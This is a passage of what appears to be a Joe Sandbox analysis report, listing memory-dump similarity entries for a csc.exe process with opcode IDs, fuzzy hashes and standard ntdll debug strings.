                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 07d6966f61c43b01fbe047335f63a78a8e7a5d5e9b4778e127407424586471f0
                                                                                                                                                                        • Instruction ID: 8c133399f0c28b0fd15b156574629c69975f84bb513328782e0a6d9135096b73
                                                                                                                                                                        • Opcode Fuzzy Hash: 07d6966f61c43b01fbe047335f63a78a8e7a5d5e9b4778e127407424586471f0
                                                                                                                                                                        • Instruction Fuzzy Hash: BBF08270B11248ABDF18EBA9D54AF9E77B8AF08705F101458E602EB3C0EA74D901C758
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f1e232957ad9277ba8218d60d6cdadef21220759fc5c021e497e3113faeaa4d9
                                                                                                                                                                        • Instruction ID: 6a42f2de64a90f45045578e128632e5f89565b7062fa42ab83c1d1964b7da489
                                                                                                                                                                        • Opcode Fuzzy Hash: f1e232957ad9277ba8218d60d6cdadef21220759fc5c021e497e3113faeaa4d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 25F08270B10248ABDF08EBA9D55AF9E7BB9AF08304F101458A502EB3D1EA74D900C718
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 749a964e75a0a33d3d5fd4e9ca0264bed72e2d21aae74398d829c9b2be9b7b38
                                                                                                                                                                        • Instruction ID: f93139801a491fb93ddfa6e3dbcf6ec7c2f38863c24514ec1f91123b3aae946a
                                                                                                                                                                        • Opcode Fuzzy Hash: 749a964e75a0a33d3d5fd4e9ca0264bed72e2d21aae74398d829c9b2be9b7b38
                                                                                                                                                                        • Instruction Fuzzy Hash: 73F05871A11248ABDB08EBA9D55AE9EB7B8AF08704F401098F602AB2C0E974D901C728
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                                        • Instruction ID: 487db9bdf4d16441414ec8ec1707af79a2b8ce4d7e92a6dbf8cfb5022585f4da
                                                                                                                                                                        • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DE0E533214614ABC3216A06D808F12FB6AFF907B0F114529A159175D09764A811CBD4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                        • Instruction ID: 3931341f77b34c41b5a55bafd1b8fe7245058466b3a15ea5bfb7f2f12376c0ae
                                                                                                                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                        • Instruction Fuzzy Hash: 23F0A03A304344DFDB19DF55C048AA97FE9FB41350B040498EC428B350E731E981CB94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                                                                        • Instruction ID: e5711c659a521541810a2666d7e3041fb5415be0afd54516fa450c9983769002
                                                                                                                                                                        • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE06D72210204ABDB68DB58CD09FA673ACFB40720F140658B126975E0DAB0AE40CA65
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: a7ead7d35a7383d6c24c2b2a577bd36611b70dcad6a0628be414a008f638ee46
                                                                                                                                                                        • Instruction ID: 8288f52279c7f3bced89b04847b0e28e208d18d58d683df7e55df852fdde74d5
                                                                                                                                                                        • Opcode Fuzzy Hash: a7ead7d35a7383d6c24c2b2a577bd36611b70dcad6a0628be414a008f638ee46
                                                                                                                                                                        • Instruction Fuzzy Hash: 17E092322106549BC721FB69DD19F8B7B9AFF90364F114519F155571A0CB34A850C798
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                        • Instruction ID: aafbf8df6e74bfb2a7f9c110e506e008feeb36cdf56c3dd1cddb2b5cc7ccbdf4
                                                                                                                                                                        • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                        • Instruction Fuzzy Hash: E4D05E32261661AFD7326F15EE0DF827AB5BFC0B20F050528B102264F096E1EE84C6A2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                        • Instruction ID: 6a83fc2b500d29e0d385aa7e447cc7f513e07ba90f049b2fe5356b51d96167b3
                                                                                                                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                        • Instruction Fuzzy Hash: 9FD0C933664A64ABD772AA1CFC04FD373E9BB88761F160859B019C7560C7A5AC81CA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                        • Instruction ID: 1fcbc8821cafe8f8576c6317d2c91f01fb7cc2a7f70f57ef45dfc048d2c75a67
                                                                                                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                        • Instruction Fuzzy Hash: 02C012332A0648AFC722EB98CD01F02BBA9EB98B40F110421F2048B670C631E820EA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                                        • Instruction ID: 9bd46cd1fff5b3f04a820927051c8707e75b3468cbdb4e772008e14516e88315
                                                                                                                                                                        • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FC08C712515856AEB2F9740C908F3C3650BF00606F96299CAA412A4A1C368A8028228
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                        • Instruction ID: 1a822902966b3aba3380affbc2c669ddee9db22af98194ac7e05440855f6d7c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                        • Instruction Fuzzy Hash: C5C04C797015428FCF15DB2DD694F5577E4F744740F151890EC05CBB21E624EC01CA11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 256bce879748dbcafb0244a3a87e7f48c22e6784d807dfdb919044a2e7e7a1dc
                                                                                                                                                                        • Instruction ID: f1d7e2aa652b76b92fed99cccdcf34435535d124746118fa793d9c76bbf7184c
                                                                                                                                                                        • Opcode Fuzzy Hash: 256bce879748dbcafb0244a3a87e7f48c22e6784d807dfdb919044a2e7e7a1dc
                                                                                                                                                                        • Instruction Fuzzy Hash: A590023264550403D10075584554716201587D1201FA9C411A4424768E8B958A51A6A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 49498c6d87fbc8e65d28f35429ccc9938c6f1b584169886db7a0d6d93228bf87
                                                                                                                                                                        • Instruction ID: 8ef0f7ac13ab47cbfd38dc21a5446d3a271e58cc7fbeeffd9393107514f73d88
                                                                                                                                                                        • Opcode Fuzzy Hash: 49498c6d87fbc8e65d28f35429ccc9938c6f1b584169886db7a0d6d93228bf87
                                                                                                                                                                        • Instruction Fuzzy Hash: 6190026264150043414075584844416701597E23013D9C115A4554760D8B188955D36D
                                                                                                                                                                        Strings
                                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05634725
                                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05634742
                                                                                                                                                                        • Execute=1, xrefs: 05634713
                                                                                                                                                                        • ExecuteOptions, xrefs: 056346A0
                                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 056346FC
                                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05634655
                                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 05634787
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                                                        • Opcode ID: ef6ce914d75ffcf1bfe8b40fb9cf920310f9062c08fd0138ae7a7c7076012445
                                                                                                                                                                        • Instruction ID: 8cdbabe19fa0272a639ed53c2a26d8afca693748d1cd54d8580fdb8a21882dff
                                                                                                                                                                        • Opcode Fuzzy Hash: ef6ce914d75ffcf1bfe8b40fb9cf920310f9062c08fd0138ae7a7c7076012445
                                                                                                                                                                        • Instruction Fuzzy Hash: 6451D831710219BAEF20EBA4DC9AFAE77A9FF4C305F0404A9E606A71D1DB709A45CF54
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                        • Instruction ID: 87b99691631b0b4ac84faa16c3e087ac53b7d2a9969a2e3d5e850c1392e62507
                                                                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                        • Instruction Fuzzy Hash: 0681AF30E592499ADF2CCE68C8517BFBBB2BF45310F18E559D8A2A77F0C6348881CB54
                                                                                                                                                                        APIs
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0563728C
                                                                                                                                                                        Strings
                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 056372C1
                                                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05637294
                                                                                                                                                                        • RTL: Resource at %p, xrefs: 056372A3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                                                        • Opcode ID: 5f029258386d5398d6d39b8b437b3da49b75c36ac18d74437aa6b4a31974b844
                                                                                                                                                                        • Instruction ID: acdb16a900367122f329f31cb1461a2f1f8d86040843f694318a0438b5ef806f
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f029258386d5398d6d39b8b437b3da49b75c36ac18d74437aa6b4a31974b844
                                                                                                                                                                        • Instruction Fuzzy Hash: 95410271704606ABC721CE24CC46F6AB7A6FF48720F100619F955AB740EB31E942CBD5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $$@
                                                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                                                        • Opcode ID: 01768d915172363db07d3966b4dd8704be6a6bb2f93a100ad911fbe0dfd28e42
                                                                                                                                                                        • Instruction ID: 78e84918c0d19846fe97fe433ca1c0b299a9eda0b540f6efc797cf724017ec50
                                                                                                                                                                        • Opcode Fuzzy Hash: 01768d915172363db07d3966b4dd8704be6a6bb2f93a100ad911fbe0dfd28e42
                                                                                                                                                                        • Instruction Fuzzy Hash: 15813C76D106699BDB35CB94CC55BEEBBB9BB48710F0081DAE90AB7640D7305E81CFA0